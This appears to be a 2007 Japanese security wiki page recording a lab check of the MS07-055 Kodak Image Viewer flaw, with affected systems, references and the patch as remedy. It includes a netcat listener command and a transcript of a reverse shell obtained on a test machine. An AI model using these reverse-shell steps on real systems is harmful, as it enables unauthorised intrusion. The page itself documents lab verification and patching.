トレース: » Cacti <= 0.8.6d graph_image.php Remote Command Execution Exploit » Prelude-IDS センサーの追加 - Nepenthes (Malware収集) » Prelude-IDS センサーの追加 - prelude-lml (ログ監視) » MS05-017:メッセージキューの脆弱性により、コードが実行される » AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit » Milw0rm SecurityFocus Exploit Archives » MySQL 5.0.x インストール » wuftpd <= 2.6.0 Remote root Exploit (SITE EXEC commands) » Ascend(Lucent) MAX4000/1800 のパスワード忘れの対応 » AirSnort - Windows編

差分

この文書の現在のバージョンと選択したバージョンの差分を表示します。

--- exploit:remote:windows:ms07-055
+++ exploit:remote:windows:ms07-055 2007/11/12 22:09 現在
@@ ライン 1: / ライン 1: @@
+====== MS07-055:Kodak Image Viewer の脆弱性により、リモートでコードが実行される======
+===== 更新履歴 =====
+  * 2007/11/12　初版
+    * //Author [[grin@flagbind.jp|grin]]//
+===== 概要 =====
+  * Kodak Image Viewer の脆弱性
+==== 影響を受けるシステム ====
+  * Windows 2000 Service Pack 4
+  * Windows XP Service Pack 2
+  * Windows Server 2003 Service Pack 1 および Windows Server 2003 Service Pack 2
+===== 参考URL =====
+  * [[http://www.microsoft.com/japan/technet/security/bulletin/ms07-055.mspx|Microsoft::マイクロソフト セキュリティ アドバイザリ (MS07-055)]]
+  * [[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2217|CVE]]
+===== Exploitの検証 =====
+==== 検証環境 ====
+  * Windows 2000 Advanced Server SP4(フルパッチ)日本語版
+==== 検証結果 ====
+  * 攻撃先IPアドレス: 192.168.0.200
+  * 攻撃元IPアドレス: 192.168.0.100
+  * 攻撃先PCのIEで攻撃元PCの80番ポートへアクセスする受動的攻撃にてリバースコネクトを行う
+<code>
+Microsoft Windows XP [Version 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+C:\tool>.\nc\nc.exe -lp 1337
+Microsoft Windows 2000 [Version 5.00.2195]
+(C) Copyright 1985-2000 Microsoft Corp.
+C:\Documents and Settings\Administrator\デスクトップ>ipconfig
+ipconfig
+Windows 2000 IP Configuration
+Ethernet adapter ローカル エリア接続 3:
+        Connection-specific DNS Suffix  . : localdomain
+        IP Address. . . . . . . . . . . . : 192.168.112.128
+        Subnet Mask . . . . . . . . . . . : 255.255.255.0
+        Default Gateway . . . . . . . . . : 192.168.112.2
+Ethernet adapter ローカル エリア接続:
+        Connection-specific DNS Suffix  . :
+        IP Address. . . . . . . . . . . . : 192.168.1.200
+        Subnet Mask . . . . . . . . . . . : 255.255.255.0
+        Default Gateway . . . . . . . . . : 192.168.0.254
+C:\Documents and Settings\Administrator\デスクトップ>hostname
+hostname
+victim
+C:\Documents and Settings\Administrator\デスクトップ>
+</code>
+  * 上記のように攻撃先PCのシェルを取得することに成功。
+===== 対処方法 =====
+  * MS07-055 パッチの適用 (Windows Update の実施)

exploit/remote/windows/ms07-055.txt · 最終更新: 2007/11/12 22:09 by grin

NINJA TOOLS